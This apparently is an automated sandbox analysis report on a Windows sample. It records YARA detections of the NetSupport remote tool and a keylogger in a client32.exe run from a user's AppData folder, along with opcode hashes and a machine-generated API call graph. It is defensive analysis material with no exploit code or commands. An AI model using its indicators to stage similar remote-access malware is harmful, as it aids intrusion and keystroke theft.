                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2327730095.0000000000F72000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.2328304043.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2328304043.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:7
                                                                            Start time:09:20:18
                                                                            Start date:17/07/2024
                                                                            Path:C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe"
                                                                            Imagebase:0xf70000
                                                                            File size:103'824 bytes
                                                                            MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.2406887302.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.2406887302.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.2406926738.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000000.2405095059.0000000000F72000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.2406580493.0000000000F72000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2d29cf0a5e41be4487ebdfe7d899e5a9500df5bbd8721d63e3e6098c5b9a6ce5
                                                                              • Instruction ID: 7439a5497d06a4c7a878ddf893df687f9342f610ed7a53c43ec3a4257315ae14
                                                                              • Opcode Fuzzy Hash: 2d29cf0a5e41be4487ebdfe7d899e5a9500df5bbd8721d63e3e6098c5b9a6ce5
                                                                              • Instruction Fuzzy Hash: 2241D431F1DD0A4EEB98B76858613B862D2EF9A794F1540BDD44EC32D7EF2EA8418205
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 396f2d236db7fa5d93f63d2f81b20fe2dcaa7929391a805ecf32203f939994bf
                                                                              • Instruction ID: f73a405b3eaf5797007b6ee63073940eb4bf91d4ab8a4a32ee5660b61dd36d8f
                                                                              • Opcode Fuzzy Hash: 396f2d236db7fa5d93f63d2f81b20fe2dcaa7929391a805ecf32203f939994bf
                                                                              • Instruction Fuzzy Hash: BB41D831F1DD0A4EFB58B76858213B862D2EF9A794F5540F9D44EC32D7EF2EA8418205
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2324117515.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fa714a618fc7152e7e227d5d6a07d5be296c5cf9a290abdad36e07c1abd39235
                                                                              • Instruction ID: 665385e184abcd0655826bf3c787e7dcb79eb578bfe5c61433ff107cc2ba3ecb
                                                                              • Opcode Fuzzy Hash: fa714a618fc7152e7e227d5d6a07d5be296c5cf9a290abdad36e07c1abd39235
                                                                              • Instruction Fuzzy Hash: FD41D271D1EE8B8FF398AB2C98556B9A6D0EF05294F4401BAD60ED71D2FF1CAC408B45
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 01249907caa7f0ebd1f93948978d4ce00d12c796eb2ee1a9229b157d38c713b9
                                                                              • Instruction ID: 5cbd2e4efae520c829275bfd62c9bd61fa6da0d3cb37abc21e246e78ed462a47
                                                                              • Opcode Fuzzy Hash: 01249907caa7f0ebd1f93948978d4ce00d12c796eb2ee1a9229b157d38c713b9
                                                                              • Instruction Fuzzy Hash: 6E31E431A0C68E4FEB94EB2894153F977E1FF9A390F04017AE40DD32D2EF2968858791
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 412e6b822343cb8c0760a48fcf47e95929a9960350df182cc4056379825a1054
                                                                              • Instruction ID: 73fed892ffb3dd753b860db06add8ed661260799100d96084eb05603ca9fd96d
                                                                              • Opcode Fuzzy Hash: 412e6b822343cb8c0760a48fcf47e95929a9960350df182cc4056379825a1054
                                                                              • Instruction Fuzzy Hash: E531A030A0C9494FEB99EB3DD454B6577E1EF9A340F5400B9D00ECB2D2EA28AC82C744
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 901bf43e26ab69c7afaf57ce44af0c255722984adbeed7deef0ace69b0689a70
                                                                              • Instruction ID: b77f724739a2236aeac3c70f9174443268df63741edceaa2ae13b3c93ea014d4
                                                                              • Opcode Fuzzy Hash: 901bf43e26ab69c7afaf57ce44af0c255722984adbeed7deef0ace69b0689a70
                                                                              • Instruction Fuzzy Hash: 96219030628E488FC798EB2CC49496573E1FF59311B4505BDD08AC7AA2EB25FC41CB40
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 903cfa33571f6b53b5adc2c89fda4b92e1c4a52b42b0ca049eeb9281836fffa9
                                                                              • Instruction ID: 64732a8f71dc950629f1cd707f8b00b5b507206baab4b095a28853e022d33ca0
                                                                              • Opcode Fuzzy Hash: 903cfa33571f6b53b5adc2c89fda4b92e1c4a52b42b0ca049eeb9281836fffa9
                                                                              • Instruction Fuzzy Hash: 27115E3160D8888FD795EB2CE8589647FE0EF6A35275A05F6E088CB1B3EA15DC80C740
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 99cded93168c81070383b894d32ba60fa059e66a1f560b7f4a11680e16228d77
                                                                              • Instruction ID: 9cbe0f88c57d84d5c682bb3126e6ca46a46a09b3cca0a05257f87a1b1dc0a3ae
                                                                              • Opcode Fuzzy Hash: 99cded93168c81070383b894d32ba60fa059e66a1f560b7f4a11680e16228d77
                                                                              • Instruction Fuzzy Hash: 09014476F0CA184FE6586A5C74061B973C1E7CA665F04023FD59FD32D1EE15681302C6
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6054563177487b2cc8edf6a75c1df2fbd03b4d09e7981c0385d810ef3130dd1d
                                                                              • Instruction ID: 87da39b7d7fef9b1fba5523117931b718e77bb4854fb4f0ef721377d69f09510
                                                                              • Opcode Fuzzy Hash: 6054563177487b2cc8edf6a75c1df2fbd03b4d09e7981c0385d810ef3130dd1d
                                                                              • Instruction Fuzzy Hash: 56014472F0C6184FE6586A5C74022B973C1E7CA665F04023FE59FD33C1EE156853028A
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c7fe4367e00d4a9d87164c0b7862acee8fbb2f0bda6a0de93061d40be3a2ff92
                                                                              • Instruction ID: cd83be9009193768983ea337bd3a5e1cd78ffa0b24d64876d30ef7400a109c9a
                                                                              • Opcode Fuzzy Hash: c7fe4367e00d4a9d87164c0b7862acee8fbb2f0bda6a0de93061d40be3a2ff92
                                                                              • Instruction Fuzzy Hash: 85015276F0CA184FE658AA5C78061B973C1E7C9575F04023FE59FD3381EE25A81302CA
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a0a506e5376f41089fab43f55e04a381af42c27b22c333741143eb22a12ed73c
                                                                              • Instruction ID: 26fec339b2288ca225cf35ad46694c0437b30b11ae131e1e4ad450b3b4b96abb
                                                                              • Opcode Fuzzy Hash: a0a506e5376f41089fab43f55e04a381af42c27b22c333741143eb22a12ed73c
                                                                              • Instruction Fuzzy Hash: E621303050CA898FDB95EB28D454F617BE1FF56344F1944A9D04ECB2E3DA25EC82DB40
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ce81cc7035057dc2b753d83cb5d0e817c9c7203891926114b10a4a9103b3508e
                                                                              • Instruction ID: f92f28f2cede075df76829fbde097dde1cfdac03c14e29483d061a6c8e1ef558
                                                                              • Opcode Fuzzy Hash: ce81cc7035057dc2b753d83cb5d0e817c9c7203891926114b10a4a9103b3508e
                                                                              • Instruction Fuzzy Hash: 1C11E935B0CE050FDB98F72C545517577C1EB99294F04053FD44ED32D2EE69A8814345
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8e72919579044ca22f96399d1b5fd974a921c7a3f2f555a6615225b752b691e8
                                                                              • Instruction ID: aaebfc6d72acb70984aa86130791465fb572424f870eb11a82f57f5d9f327a46
                                                                              • Opcode Fuzzy Hash: 8e72919579044ca22f96399d1b5fd974a921c7a3f2f555a6615225b752b691e8
                                                                              • Instruction Fuzzy Hash: 9E118C32A4C9894FD721BB249C518E67BE5EF86350F0401AAD04DC71D2EA6EA886C345
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                              • Instruction ID: 650e55435db4c428520be756852e448c507beb6490eab5e5db5e4b15553b9e06
                                                                              • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                              • Instruction Fuzzy Hash: DC01677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: dbc04e7ad051664b5e2d317eefb4ec48b2900080cb86f3a310767513e8b84629
                                                                              • Instruction ID: 61ce78adbf51039a491df802d437227b5c897ed65b282cdbd1e6872debd588a8
                                                                              • Opcode Fuzzy Hash: dbc04e7ad051664b5e2d317eefb4ec48b2900080cb86f3a310767513e8b84629
                                                                              • Instruction Fuzzy Hash: FCF0C233E4C94D8EEB10A669BC119E87BD5EF8A368F090079E40CC31D1E76B5881C255
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: O_^8$O_^I$O_^J$O_^K$O_^N$O_^Y
                                                                              • API String ID: 0-1866808879
                                                                              • Opcode ID: eb6428380b1fca2602e853d65f5f6c062327f1a6b3cd520b12bbd4032938ed34
                                                                              • Instruction ID: a19ce53fe14e8962c5df3b9a14c3d46841fc41e242b24f21d5f5bd71ed926bc8
                                                                              • Opcode Fuzzy Hash: eb6428380b1fca2602e853d65f5f6c062327f1a6b3cd520b12bbd4032938ed34
                                                                              • Instruction Fuzzy Hash: F521387762A01296D10237AD7C021DAB795FF943BAB5802F6D25ECE203DE2D64C786D8

                                                                              Execution Graph

                                                                              Execution Coverage:6.3%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:15.9%
                                                                              Total number of Nodes:2000
                                                                              Total number of Limit Nodes:80
library calls 82826->82850 82828 11174901 82830 1117490b GetLocaleInfoA 82828->82830 82842 1117493b _LangCountryEnumProc@4 _strlen 82828->82842 82829 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 82831 11174a65 82829->82831 82832 1117492a 82830->82832 82830->82834 82851 1116558e 85 API calls 2 library calls 82832->82851 82833 111749ae GetLocaleInfoA 82833->82834 82836 111749d1 82833->82836 82834->82829 82853 1116558e 85 API calls 2 library calls 82836->82853 82838 11174935 82838->82842 82852 11164644 85 API calls 2 library calls 82838->82852 82839 111749dc 82839->82834 82843 111749e4 _strlen 82839->82843 82854 1116558e 85 API calls 2 library calls 82839->82854 82842->82833 82842->82834 82843->82834 82855 1117483d GetLocaleInfoW _GetPrimaryLen _strlen 82843->82855 82856 1116c5fc GetLastError 82845->82856 82847 1116c67d 82848 1116c68a 82847->82848 82870 1116e66a 66 API calls 3 library calls 82847->82870 82848->82824 82850->82828 82851->82838 82852->82842 82853->82839 82854->82843 82855->82834 82871 1116c4ba TlsGetValue 82856->82871 82859 1116c669 SetLastError 82859->82847 82862 1116c62f DecodePointer 82863 1116c644 82862->82863 82864 1116c660 82863->82864 82865 1116c648 82863->82865 82881 11163aa5 82864->82881 82880 1116c548 66 API calls 4 library calls 82865->82880 82868 1116c650 GetCurrentThreadId 82868->82859 82869 1116c666 82869->82859 82872 1116c4cf DecodePointer TlsSetValue 82871->82872 82873 1116c4ea 82871->82873 82872->82873 82873->82859 82874 1116ac7e 82873->82874 82876 1116ac87 82874->82876 82877 1116acc4 82876->82877 82878 1116aca5 Sleep 82876->82878 82887 11170fc4 82876->82887 82877->82859 82877->82862 82879 1116acba 82878->82879 82879->82876 82879->82877 82880->82868 82882 11163ab0 HeapFree 82881->82882 82883 11163ad9 __dosmaperr 82881->82883 82882->82883 82884 11163ac5 82882->82884 82883->82869 82898 1116a1af 66 API calls __getptd_noexit 82884->82898 82886 11163acb GetLastError 82886->82883 82888 11170fd0 82887->82888 
82895 11170feb 82887->82895 82889 11170fdc 82888->82889 82888->82895 82896 1116a1af 66 API calls __getptd_noexit 82889->82896 82890 11170ffe RtlAllocateHeap 82892 11171025 82890->82892 82890->82895 82892->82876 82893 11170fe1 82893->82876 82895->82890 82895->82892 82897 1116e368 DecodePointer 82895->82897 82896->82893 82897->82895 82898->82886 82899 11030ef3 RegOpenKeyExA 82900 11030f20 82899->82900 82901 1103103d 82899->82901 82983 11143bd0 RegQueryValueExA 82900->82983 82904 11031061 82901->82904 82906 11031145 82901->82906 82908 111101b0 std::_Mutex::_Mutex 265 API calls 82904->82908 82905 11031030 RegCloseKey 82905->82901 82909 111101b0 std::_Mutex::_Mutex 265 API calls 82906->82909 82916 11031088 82908->82916 82911 1103114c 82909->82911 83134 110fae60 272 API calls std::_Mutex::_Mutex 82911->83134 82912 111648ed std::_Mutex::_Mutex 79 API calls 82914 11030f6d 82912->82914 82915 11030f86 82914->82915 82918 111648ed std::_Mutex::_Mutex 79 API calls 82914->82918 82919 11163ca7 std::_Mutex::_Mutex 79 API calls 82915->82919 82917 110312db GetStockObject GetObjectA 82916->82917 82920 1103130a SetErrorMode SetErrorMode 82917->82920 82918->82914 82924 11030f92 82919->82924 82922 111101b0 std::_Mutex::_Mutex 265 API calls 82920->82922 82923 11031346 82922->82923 82989 11028980 82923->82989 82924->82905 82925 11143bd0 std::_Mutex::_Mutex RegQueryValueExA 82924->82925 82928 11030fe8 82925->82928 82927 11031360 82930 111101b0 std::_Mutex::_Mutex 265 API calls 82927->82930 82929 11143bd0 std::_Mutex::_Mutex RegQueryValueExA 82928->82929 82931 11031011 82929->82931 82932 11031386 82930->82932 82931->82905 82933 11028980 268 API calls 82932->82933 82934 1103139f InterlockedExchange 82933->82934 82936 111101b0 std::_Mutex::_Mutex 265 API calls 82934->82936 82937 110313c7 82936->82937 82992 1108a880 82937->82992 82939 110313df GetACP 83003 11163f93 82939->83003 82944 11031410 83050 11143780 82944->83050 82947 111101b0 std::_Mutex::_Mutex 265 API calls 82948 1103145c 
82947->82948 83056 11061aa0 82948->83056 82951 110314d4 83075 110ccc90 82951->83075 82952 111101b0 std::_Mutex::_Mutex 265 API calls 82954 110314ae 82952->82954 83135 11061710 82954->83135 82956 111101b0 std::_Mutex::_Mutex 265 API calls 82957 11031501 82956->82957 83082 11125d40 82957->83082 82984 11030f4a 82983->82984 82984->82905 82985 11163ca7 82984->82985 82986 11163c91 82985->82986 83148 1116450b 82986->83148 82990 11088b30 268 API calls 82989->82990 82991 1102898b _memset 82990->82991 82991->82927 82993 111101b0 std::_Mutex::_Mutex 265 API calls 82992->82993 82994 1108a8b7 82993->82994 82995 1108a8d9 InitializeCriticalSection 82994->82995 82996 111101b0 std::_Mutex::_Mutex 265 API calls 82994->82996 82999 1108a93a 82995->82999 82998 1108a8d2 82996->82998 82998->82995 83242 1116305a 66 API calls std::exception::_Copy_str 82998->83242 82999->82939 83001 1108a909 83243 111634b1 RaiseException 83001->83243 83004 11163fc6 83003->83004 83005 11163fb1 83003->83005 83004->83005 83007 11163fcd 83004->83007 83266 1116a1af 66 API calls __getptd_noexit 83005->83266 83244 1117027b 102 API calls 10 library calls 83007->83244 83008 11163fb6 83267 1116edc4 11 API calls _sprintf 83008->83267 83011 11163ff3 83012 11031406 83011->83012 83245 111700e4 83011->83245 83014 111663a3 83012->83014 83015 111663af __close 83014->83015 83016 111663d0 83015->83016 83017 111663b9 83015->83017 83019 1116c675 __getptd 66 API calls 83016->83019 83311 1116a1af 66 API calls __getptd_noexit 83017->83311 83021 111663d5 83019->83021 83020 111663be 83312 1116edc4 11 API calls _sprintf 83020->83312 83023 11171306 _setlocale 74 API calls 83021->83023 83024 111663df 83023->83024 83025 1116ac7e __calloc_crt 66 API calls 83024->83025 83026 111663f5 83025->83026 83027 111663c9 __close _setlocale 83026->83027 83028 1117459f __lock 66 API calls 83026->83028 83027->82944 83029 1116640b 83028->83029 83286 11165814 83029->83286 83036 111664ec 83317 111710d5 8 API calls 83036->83317 83037 1116643b _setlocale 
83040 1117459f __lock 66 API calls 83037->83040 83039 111664f2 83318 1117116e 66 API calls 4 library calls 83039->83318 83041 11166461 83040->83041 83313 111712b9 74 API calls 3 library calls 83041->83313 83044 11166473 83314 111710d5 8 API calls 83044->83314 83046 11166479 83047 11166497 83046->83047 83315 111712b9 74 API calls 3 library calls 83046->83315 83316 111664e1 LeaveCriticalSection _doexit 83047->83316 83470 11143690 83050->83470 83052 11166654 85 API calls std::_Mutex::_Mutex 83054 11143795 83052->83054 83053 11143690 IsDBCSLeadByte 83053->83054 83054->83052 83054->83053 83055 1103143c 83054->83055 83055->82947 83057 11061710 293 API calls 83056->83057 83058 11061ade 83057->83058 83059 111101b0 std::_Mutex::_Mutex 265 API calls 83058->83059 83060 11061b0b 83059->83060 83061 11061b24 83060->83061 83062 11061710 293 API calls 83060->83062 83063 111101b0 std::_Mutex::_Mutex 265 API calls 83061->83063 83062->83061 83064 11061b35 83063->83064 83065 11061710 293 API calls 83064->83065 83067 11061b4e 83064->83067 83065->83067 83066 11031487 83066->82951 83066->82952 83067->83066 83482 11142e60 83067->83482 83069 11061b76 83491 11061a70 83069->83491 83076 110ccc99 83075->83076 83077 110314fa 83075->83077 83610 11145410 GetSystemMetrics GetSystemMetrics 83076->83610 83077->82956 83079 110ccca0 std::_Mutex::_Mutex 83079->83077 83080 110cccae CreateWindowExA 83079->83080 83080->83077 83081 110cccd8 SetClassLongA 83080->83081 83081->83077 83083 111101b0 std::_Mutex::_Mutex 265 API calls 83082->83083 83084 11125d74 83083->83084 83085 11125da5 83084->83085 83086 11125d8a 83084->83086 83611 11124f70 83085->83611 83657 110765c0 467 API calls std::_Mutex::_Mutex 83086->83657 83088 11125d9a 83088->83085 83134->82916 83136 111101b0 std::_Mutex::_Mutex 265 API calls 83135->83136 83137 11061761 83136->83137 83138 11061777 InitializeCriticalSection 83137->83138 84771 11061210 266 API calls 3 library calls 83137->84771 83141 110617b7 83138->83141 83146 11061826 83138->83146 
84772 1105f830 287 API calls 3 library calls 83141->84772 83143 110617d8 RegCreateKeyExA 83144 11061832 RegCreateKeyExA 83143->83144 83145 110617ff RegCreateKeyExA 83143->83145 83144->83146 83147 11061865 RegCreateKeyExA 83144->83147 83145->83144 83145->83146 83146->82951 83147->83146 83149 11164524 83148->83149 83152 111642e0 83149->83152 83164 11164259 83152->83164 83154 11164304 83172 1116a1af 66 API calls __getptd_noexit 83154->83172 83157 11164309 83173 1116edc4 11 API calls _sprintf 83157->83173 83160 1116433a 83161 11164381 83160->83161 83174 11171a63 79 API calls 3 library calls 83160->83174 83163 11030f5e 83161->83163 83175 1116a1af 66 API calls __getptd_noexit 83161->83175 83163->82912 83165 1116426c 83164->83165 83169 111642b9 83164->83169 83166 1116c675 __getptd 66 API calls 83165->83166 83167 11164271 83166->83167 83168 11164299 83167->83168 83176 11171306 83167->83176 83168->83169 83191 111715a2 68 API calls 6 library calls 83168->83191 83169->83154 83169->83160 83172->83157 83173->83163 83174->83160 83175->83163 83177 11171312 __close 83176->83177 83178 1116c675 __getptd 66 API calls 83177->83178 83179 11171317 83178->83179 83180 11171345 83179->83180 83182 11171329 83179->83182 83193 1117459f 83180->83193 83184 1116c675 __getptd 66 API calls 83182->83184 83183 1117134c 83200 111712b9 74 API calls 3 library calls 83183->83200 83186 1117132e 83184->83186 83190 1117133c __close 83186->83190 83192 1116e66a 66 API calls 3 library calls 83186->83192 83187 11171360 83201 11171373 LeaveCriticalSection _doexit 83187->83201 83190->83168 83191->83169 83194 111745c7 EnterCriticalSection 83193->83194 83195 111745b4 83193->83195 83194->83183 83202 111744dd 83195->83202 83197 111745ba 83197->83194 83229 1116e66a 66 API calls 3 library calls 83197->83229 83200->83187 83201->83186 83203 111744e9 __close 83202->83203 83204 11174511 83203->83204 83205 111744f9 83203->83205 83211 1117451f __close 83204->83211 83233 1116ac39 83204->83233 83230 1116e85d 66 API calls 2 
library calls 83205->83230 83207 111744fe 83231 1116e6ae 66 API calls 7 library calls 83207->83231 83211->83197 83212 11174505 83232 1116e3ed GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 83212->83232 83213 11174531 83239 1116a1af 66 API calls __getptd_noexit 83213->83239 83214 11174540 83215 1117459f __lock 65 API calls 83214->83215 83218 11174547 83215->83218 83220 1117454f InitializeCriticalSectionAndSpinCount 83218->83220 83221 1117457a 83218->83221 83222 1117456b 83220->83222 83223 1117455f 83220->83223 83224 11163aa5 _free 65 API calls 83221->83224 83241 11174596 LeaveCriticalSection _doexit 83222->83241 83225 11163aa5 _free 65 API calls 83223->83225 83224->83222 83226 11174565 83225->83226 83240 1116a1af 66 API calls __getptd_noexit 83226->83240 83230->83207 83231->83212 83234 1116ac42 83233->83234 83235 11163a11 _malloc 65 API calls 83234->83235 83236 1116ac78 83234->83236 83237 1116ac59 Sleep 83234->83237 83235->83234 83236->83213 83236->83214 83238 1116ac6e 83237->83238 83238->83234 83238->83236 83239->83211 83240->83222 83241->83211 83242->83001 83243->82995 83244->83011 83268 1116a147 83245->83268 83247 111700f4 83248 11170116 83247->83248 83249 111700ff 83247->83249 83251 1117011a 83248->83251 83259 11170127 __stbuf 83248->83259 83278 1116a1af 66 API calls __getptd_noexit 83249->83278 83279 1116a1af 66 API calls __getptd_noexit 83251->83279 83253 11170188 83254 11170217 83253->83254 83255 11170197 83253->83255 83283 111730a4 97 API calls 6 library calls 83254->83283 83257 111701ae 83255->83257 83262 111701cb 83255->83262 83281 111730a4 97 API calls 6 library calls 83257->83281 83259->83253 83261 11170104 83259->83261 83263 1117017d 83259->83263 83280 111799f8 66 API calls _sprintf 83259->83280 83261->83012 83262->83261 83282 1117650e 71 API calls 6 library calls 83262->83282 83263->83253 83275 11177ff0 83263->83275 83266->83008 83267->83012 83269 1116a153 83268->83269 83270 1116a168 83268->83270 83284 1116a1af 66 API calls 
__getptd_noexit 83269->83284 83270->83247 83272 1116a158 83285 1116edc4 11 API calls _sprintf 83272->83285 83274 1116a163 83274->83247 83276 1116ac39 __malloc_crt 66 API calls 83275->83276 83277 11178005 83276->83277 83277->83253 83278->83261 83279->83261 83280->83263 83281->83261 83282->83261 83283->83261 83284->83272 83285->83274 83287 1116581d 83286->83287 83288 11165836 83286->83288 83287->83288 83319 11171046 8 API calls 83287->83319 83290 111664d5 83288->83290 83320 111744c6 LeaveCriticalSection 83290->83320 83292 11166422 83293 11166187 83292->83293 83294 111661b0 83293->83294 83298 111661cb 83293->83298 83297 11165e4d __setlocale_set_cat 101 API calls 83294->83297 83303 111661ba 83294->83303 83295 1116631c 83321 11165c2c 83295->83321 83297->83303 83298->83295 83306 111662f5 83298->83306 83310 11166200 _strpbrk _strncmp _strcspn _strlen 83298->83310 83300 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 83302 111663a1 83300->83302 83301 11166331 _setlocale 83301->83303 83301->83306 83335 11165e4d 83301->83335 83302->83036 83302->83037 83303->83300 83306->83303 83381 11165ac7 70 API calls 6 library calls 83306->83381 83307 1116630e 83378 1116ed72 83307->83378 83309 11165e4d __setlocale_set_cat 101 API calls 83309->83310 83310->83303 83310->83306 83310->83307 83310->83309 83377 111699f9 66 API calls _sprintf 83310->83377 83311->83020 83312->83027 83313->83044 83314->83046 83315->83047 83316->83027 83317->83039 83318->83027 83319->83288 83320->83292 83322 1116c675 __getptd 66 API calls 83321->83322 83323 11165c67 83322->83323 83332 11165ccd _memmove _setlocale _strlen 83323->83332 83333 11165cd4 